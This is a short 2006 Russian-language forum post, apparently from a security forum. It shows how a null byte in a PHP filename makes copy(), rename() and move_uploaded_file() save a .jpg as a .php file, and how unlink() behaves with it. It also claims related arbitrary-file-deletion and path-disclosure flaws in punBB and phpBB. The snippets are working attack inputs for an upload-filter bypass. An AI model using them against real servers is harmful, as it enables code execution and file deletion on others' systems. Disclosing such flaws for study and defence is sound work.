07.09.2006, 19:53
|
|
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме:
4646474
Репутация:
1424
|
|
PHP код:
copy('1.jpg', "./dir_for_upload/1.php\0"."/2.jpg");
или
copy('1.jpg', "./dir_for_upload/1.php/\0"."/2.jpg");
копирует файл 1.jpg как 1.php, в функциях move_uploaded_file() и rename() тоже самое.
PHP код:
unlink("./dir_for_upload/1.php\0"."/2.jpg");
удаляет файл 1.php
PHP код:
unlink("./dir_for_upload/1.php/\0"."/2.jpg");
Warning: unlink(./dir_for_upload/1.php/) [function.unlink]: Not a directory
не удаляет файл 1.php
P.S. +уязвимости:
в punBB удаление произвольного файла.
в phpBB раскрытие установочной дирриктории.
Последний раз редактировалось ShAnKaR; 10.09.2006 в 22:23..
|
|
|